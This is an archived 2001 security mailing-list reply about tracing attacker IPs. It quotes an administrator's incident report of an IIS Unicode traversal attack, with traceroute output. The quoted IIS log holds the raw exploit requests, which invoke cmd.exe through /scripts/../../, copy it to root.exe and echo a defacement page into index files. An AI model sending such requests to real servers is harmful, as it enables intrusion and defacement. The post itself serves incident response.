RE: who's owning this ip?

From: Matt Rowley (matt.rowleyat_private)
Date: Mon May 14 2001 - 10:26:17 PDT

  • Next message: David Ford: "Re: [rootat_private: student6 05/14/01:16.02 system check]" 

    http://www.arin.net/cgi-bin/whois.pl
to reverse lookup the ip for the coordinator.

--Matt

> -----Original Message-----
> From: Incidents Mailing List [mailto:INCIDENTSat_private]On
> Behalf Of Thomas Springer
> Sent: Tuesday, May 08, 2001 12:08 PM
> To: INCIDENTSat_private
> Subject: who's owning this ip?
>
>
> We had an attacker exploiting unicode on iis5 yesterday - see funny
> chinese-war-pages in the log below. The hacker successfully exploited
> IIS-Unicode bug, created ~100 files but was still too dumb to deface the
> webserver.
>
> The attacker used 208.22.161.15 and 202.97.205.3.
> I tried a trace but ended up with
>  ...
>  19   210 ms   211 ms   220 ms  pao1-sjc2-oc48-2.pao1.above.net [
>  20   210 ms   231 ms   230 ms  208.184.129.244.cmnetcom.com.hk [
>  21   200 ms   211 ms   220 ms  202.0.170.34
>  22   361 ms   370 ms   411 ms  202.0.170.13
>  23   370 ms   391 ms   400 ms  202.97.10.193
>  24   521 ms   541 ms   551 ms  202.97.10.66
>  25   581 ms   601 ms   581 ms  61.138.38.2
>  26   721 ms   711 ms   671 ms  61.180.139.202
>  27   341 ms   350 ms   351 ms  202.97.205.3
>
> 208.22.161.15 seems to end at
> 17   130 ms   130 ms   131 ms  ewr-core-02.inet.qwest.net
> [205.171.17.130]
> 18   110 ms   110 ms   111 ms  ewr-brdr-01.inet.qwest.net
> [205.171.17.82]
> 19     *        *        *     Timeout..
> ....
>
> Any chances to find out, to whom the two ip-adresses belong?
> Any tool that copies cmd.exe to root.exe?
>
> I liked this hack, because nothing happend and people her
> suddenly develop
> security-awareness. hence, even the servers i begged to secure for weeks
> are patched now.
> BTW it's a german website - nothing to do with an
> chinese-american spy-wars.
>
> funny hackerworld...
>
> thomas
>
> --- IIS-Logsnip ---
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
> /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
> /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 856 70 - - -
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
> /scripts/../../winnt/system32/cmd.exe
> /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
> /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>
> ^<br^>^<br^>
> ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+siz
> e%3D7+color%
> 3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22ce
> nter%22^>^<f
> ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D
> %22center%22
> ^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</h
> tml^>>.././i
> ndex.asp 502 355 423 - - -
> 2001-05-07 12:28:55 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
> /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>
> ^<br^>^<br^>
> ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+siz
> e%3D7+color%
> 3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22ce
> nter%22^>^<f
> ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D
> %22center%22
> ^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</h
> tml^>>.././i
> ndex.htm 502 355 423 - - -
>
>
> Thomas Springer

    This archive was generated by hypermail 2b30 : Mon May 14 2001 - 14:43:52 PDT